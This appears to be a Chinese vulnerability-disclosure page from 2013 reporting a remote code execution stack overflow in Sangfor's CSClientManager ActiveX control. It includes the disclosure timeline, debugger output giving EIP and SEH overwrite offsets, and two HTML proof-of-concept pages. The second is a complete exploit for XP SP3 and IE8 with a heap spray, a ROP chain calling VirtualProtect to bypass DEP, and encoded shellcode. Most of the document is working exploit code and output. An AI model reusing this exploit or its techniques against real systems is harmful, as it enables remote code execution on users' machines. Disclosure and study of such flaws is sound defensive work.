漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:#4 Sangfor CSClientManager Activex Remote Code Execution bypass dep on ie8
提交时间:2013-11-16 17:00
修复时间:2014-02-14 17:01
公开时间:2014-02-14 17:01
漏洞类型:远程代码执行
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情 披露状态:
2013-11-16: 细节已通知厂商并且等待厂商处理中 2013-11-18: 厂商已经确认,细节仅向厂商公开 2013-11-21: 细节向第三方安全合作伙伴开放 2014-01-12: 细节向核心白帽子及相关领域专家公开 2014-01-22: 细节向普通白帽子公开 2014-02-01: 细节向实习白帽子公开 2014-02-14: 细节向公众公开
简要描述: [+] Looking for cyclic pattern in memory Cyclic pattern (normal) found at 0x03750630 (length 1000 bytes) Cyclic pattern (normal) found at 0x03750e66 (length 1000 bytes) Cyclic pattern (normal) found at 0x03df203d (length 1000 bytes) Cyclic pattern (normal) found at 0x03e54d1d (length 1000 bytes) Cyclic pattern (normal) found at 0x016ad0ee (length 1000 bytes) Cyclic pattern (unicode) found at 0x03745da4 (length 252 bytes) Cyclic pattern (unicode) found at 0x03747e38 (length 1996 bytes) Cyclic pattern (unicode) found at 0x03748d2e (length 999 bytes) Cyclic pattern (unicode) found at 0x0407063a (length 999 bytes) Cyclic pattern (unicode) found at 0x040c6236 (length 999 bytes) Cyclic pattern (unicode) found at 0x040c6a64 (length 1996 bytes) Cyclic pattern (unicode) found at 0x03e09bce (length 999 bytes) EIP overwritten with normal pattern : 0x67413367 (offset 190) ESP (0x016ad1b4) points at offset 198 in normal pattern (length 802) EBP (0x016ad1ec) points at offset 254 in normal pattern (length 746) [+] Examining SEH chain SEH record (nseh field) at 0x016ad1c4 overwritten with normal pattern : 0x33684132 (offset 214), followed by 782 bytes of cyclic data
详细说明: 该漏洞控件源自深信服官方渠道登录,请对其升级,看版本应该是新版的?6.0,之前的漏洞是4.X版本的
名称: CSClientManager Class 发行者: Sangfor Technologies Co.,Ltd 类型: ActiveX 控件 版本: 6. 0. 0. 0 文件日期: 上次访问日期: 2013年11月16日,14:51 类 ID: {D257CF85-8E97-4C9B-8407-459B28006000} 使用计数: 118 阻止次数: 0 文件: CSClientManagerPrj.dll 文件夹: C:\Program Files\Sangfor\SSL\ClientComponent3
[+] Looking for cyclic pattern in memory Cyclic pattern (normal) found at 0x03750630 (length 1000 bytes) Cyclic pattern (normal) found at 0x03750e66 (length 1000 bytes) Cyclic pattern (normal) found at 0x03df203d (length 1000 bytes) Cyclic pattern (normal) found at 0x03e54d1d (length 1000 bytes) Cyclic pattern (normal) found at 0x016ad0ee (length 1000 bytes) Cyclic pattern (unicode) found at 0x03745da4 (length 252 bytes) Cyclic pattern (unicode) found at 0x03747e38 (length 1996 bytes) Cyclic pattern (unicode) found at 0x03748d2e (length 999 bytes) Cyclic pattern (unicode) found at 0x0407063a (length 999 bytes) Cyclic pattern (unicode) found at 0x040c6236 (length 999 bytes) Cyclic pattern (unicode) found at 0x040c6a64 (length 1996 bytes) Cyclic pattern (unicode) found at 0x03e09bce (length 999 bytes) EIP overwritten with normal pattern : 0x67413367 (offset 190) ESP (0x016ad1b4) points at offset 198 in normal pattern (length 802) EBP (0x016ad1ec) points at offset 254 in normal pattern (length 746) [+] Examining SEH chain SEH record (nseh field) at 0x016ad1c4 overwritten with normal pattern : 0x33684132 (offset 214), followed by 782 bytes of cyclic data
漏洞证明:
<html> <object classid='clsid:D257CF85-8E97-4C9B-8407-459B28006000' id='target' ></object> <script > junk1 = ""; while(junk1.length < 190) junk1+="A"; eip = "BBBB"; junk2 = "CCCCCCCCCCCCCCCCCCCC"; nseh = "DDDD"; seh ="EEEE"; junk3 = "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"; payload = junk1 + eip + junk2 + nseh + seh + junk3; target.checkRelogin(payload); </script> </html>
test on win xp spy ie8 rop bypass dep
<html> <head> <title>Sangfor Activex stack overflow PoC bypass dep on xpsp3 ie8</title> </head> <body> <!--[+] Looking for cyclic pattern in memory Cyclic pattern (normal) found at 0x03710440 (length 1000 bytes) Cyclic pattern (normal) found at 0x03710c76 (length 1000 bytes) Cyclic pattern (normal) found at 0x00188a88 (length 16 bytes) Cyclic pattern (normal) found at 0x03dedc28 (length 1000 bytes) Cyclic pattern (normal) found at 0x03e52d10 (length 1000 bytes) Cyclic pattern (normal) found at 0x016ad0ee (length 1000 bytes) Cyclic pattern (unicode) found at 0x0409d632 (length 999 bytes) Cyclic pattern (unicode) found at 0x040d6236 (length 999 bytes) Cyclic pattern (unicode) found at 0x040d6a64 (length 1996 bytes) Cyclic pattern (unicode) found at 0x03705d6c (length 252 bytes) Cyclic pattern (unicode) found at 0x03707e00 (length 1996 bytes) Cyclic pattern (unicode) found at 0x03708cf6 (length 999 bytes) Cyclic pattern (unicode) found at 0x03e05fb4 (length 999 bytes) EIP overwritten with normal pattern : 0x67413367 (offset 190) ESP (0x016ad1b4) points at offset 198 in normal pattern (length 802) EBP (0x016ad1ec) points at offset 254 in normal pattern (length 746) [+] Examining SEH chain SEH record (nseh field) at 0x016ad1c4 overwritten with normal pattern : 0x33684132 (offset 214), followed by 782 bytes of cyclic data [+] Examining stack (entire stack) - looking for cyclic pattern Walking stack from 0x0168f000 to 0x016afffc (0x00020ffc bytes) 0x016ad0f0 : Contains normal cyclic pattern at ESP-0xc4 (-196) : offset 2, length 998 (-> 0x016ad4d5 : ESP+0x322) --> <object classid="clsid:D257CF85-8E97-4C9B-8407-459B28006000" id='poc'></object> <script> // [ Shellcode ] var shellcode = unescape('%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u6c61%u0063'); var rop_chain = //"\uBE4C\u77BE" + // 0x77BEBE4C # retn [msvcrt.dll] // "\uBE4B\u77BE" + // 0x77BEBE4B # pop ebp # retn [msvcrt.dll] // "\u5ED5\u77BE" + // 0x77BE5ED5 # xchg eax, esp # retn [msvcrt.dll] // "\uBE4C\u77BE" + // 0x77BEBE4C # retn [msvcrt.dll] // "\uBE4C\u77BE" + // 0x77BEBE4C # retn [msvcrt.dll] // "\uBE4C\u77BE" + // 0x77BEBE4C # retn [msvcrt.dll] // "\uBE4C\u77BE" + // 0x77BEBE4C # retn [msvcrt.dll] // The real rop chain "\ube4b\u77be" + // 0x77bebe4b : ,# POP EBP # RETN [msvcrt.dll] "\ube4b\u77be" + // 0x77bebe4b : ,# skip 4 bytes [msvcrt.dll] "\u6e9d\u77c1" + // 0x77c16e9d : ,# POP EBX # RETN [msvcrt.dll] "\uE000\u0000" + // 0x0000E000 : ,# 0x0000E000-> ebx [dwSize] "\ucdec\u77c1" + // 0x77c1cdec : ,# POP EDX # RETN [msvcrt.dll] "\u0040\u0000" + // 0x00000040 : ,# 0x00000040-> edx "\u79da\u77bf" + // 0x77bf79da : ,# POP ECX # RETN [msvcrt.dll] "\uf67e\u77c2" + // 0x77c2f67e : ,# &Writable location [msvcrt.dll] "\uaf6b\u77c0" + // 0x77c0af6b : ,# POP EDI # RETN [msvcrt.dll] "\u9f92\u77c0" + // 0x77c09f92 : ,# RETN (ROP NOP) [msvcrt.dll] "\u6f5a\u77c1" + // 0x77c16f5a : ,# POP ESI # RETN [msvcrt.dll] "\uaacc\u77bf" + // 0x77bfaacc : ,# JMP [EAX] [msvcrt.dll] "\u289b\u77c2" + // 0x77c2289b : ,# POP EAX # RETN [msvcrt.dll] "\u1131\u77be" + // 0x77BE1131 : ,# ptr to &VirtualProtect() [IAT msvcrt.dll] 0x20-0xEF=0x31 "\u67f0\u77c2" + // 0x77c267f0 : ,# PUSHAD # ADD AL,0EF # RETN [msvcrt.dll] "\u1025\u77c2"; // 0x77c21025 : ,# ptr to 'push esp # ret ' [msvcrt.dll] // [ fill the heap with 0x0c0c0c0c ] About 0x2000 Bytes var fill = "\u0c0c\u0c0c"; while (fill.length < 0x1000){ fill += fill; } // [ padding offset ] padding = fill.substring(0, 0x5F6); // [ fill each chunk with 0x1000 bytes ] evilcode = padding + rop_chain + shellcode + fill.substring(0, 0x800 - padding.length - rop_chain.length - shellcode.length); // [ repeat the block to 512KB ] while (evilcode.length < 0x40000){ evilcode += evilcode; } // [ substring(2, 0x40000 - 0x21) - XP SP3 + IE8 ] var block = evilcode.substring(2, 0x40000 - 0x21); // [ Allocate 200 MB ] var slide = new Array(); for (var i = 0; i < 400; i++){ slide[i] = block.substring(0, block.length); } var junk = ''; while(junk.length<190) junk += 'A'; popeax = "\x28\x7b\x71\x7d";// 0x7d717b28 {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.6242 (C:\WINDOWS\system32\SHELL32.dll) xchg = "\x79\x68\x44\x3e"; //0x3e446879 {PAGE_EXECUTE_READ} [WININET.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v8.00.6001.19394 (C:\WINDOWS\system32\WININET.dll) str = "\x0c\x0c\x0c\x0c"; payload = junk + popeax + str +str +xchg; poc.checkRelogin(payload); </script> </body> </html>
修复方案: 漏洞回应 厂商回应: 危害等级:中
漏洞Rank:8
确认时间:2013-11-18 16:53
厂商回复:
最新状态: 暂无